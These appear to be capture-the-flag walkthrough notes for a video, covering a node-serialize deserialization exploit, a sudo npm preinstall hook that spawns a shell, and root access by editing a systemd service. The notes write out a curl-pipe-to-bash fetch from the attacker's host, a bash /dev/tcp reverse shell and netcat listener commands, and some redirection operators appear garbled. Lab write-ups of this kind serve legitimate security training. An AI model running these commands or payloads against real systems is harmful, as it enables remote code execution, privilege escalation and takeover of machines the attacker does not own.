https://twitter.com/pixelbit131
Highly recommended to read this article: https://tinyurl.com/4svjt67a
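Very important: add the IIFE brackets () after the function body (min 07:54). node-serialize rebuilds serialized functions with eval() when unserialize() is called, so an immediately-invoked function runs during deserialization itself. This is why untrusted data must never reach unserialize().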
log.js
**********************************************************************
// Object to be serialized: a single property `rce` whose value is a function.
// The function body below is a placeholder (to be replaced with the output of
// nodeShell.py), so this listing is not valid JavaScript as shown.
var y = {
rce: function(){*PASTE HERE THE OUTPUT OF nodeShell.py*}
}
// node-serialize is a third-party package. Its serialize() keeps function
// values as source text behind a `_$$ND_FUNC$$_` marker, and its unserialize()
// turns that text back into code with eval().
// NOTE(review): the defensive point is on the receiving side. An application
// must not pass client-controlled data to unserialize(); plain JSON.parse is
// enough for data exchange, and the `_$$ND_FUNC$$_` marker appearing in inbound
// requests is a useful detection signal.
var serialize = require('node-serialize');
// Print the serialized form of `y` to stdout.
console.log("Serialized: \n" + serialize.serialize(y));
**********************************************************************
nodeShell.py
https://github.com/piyush-saurabh/exploits/blob/master/nodejsshell.py
******************** GAINING ACCESS AS serv-manage *****************
cd /dev/shm
mkdir exploit
echo '{"scripts": {"preinstall": "/bin/sh"}}' -- exploit/package.json
sudo -u serv-manage /usr/bin/npm -C /dev/shm/exploit/ --unsafe-perm i
********************* GAINING ACCESS AS ROOT *********************
nano /etc/systemd/system/vulnnet-job.service
ExecStart=/bin/bash -c "curl 10.2.37.106:9013/shell.sh | bash"
Generate a REVERSE SHELL
nano shell.sh
bash -i --& /dev/tcp/10.2.37.106/8013 0--&1
k4is3r@parrot: python3 -m http.server 9013
k4is3r@parrot: nc -nlvp 8013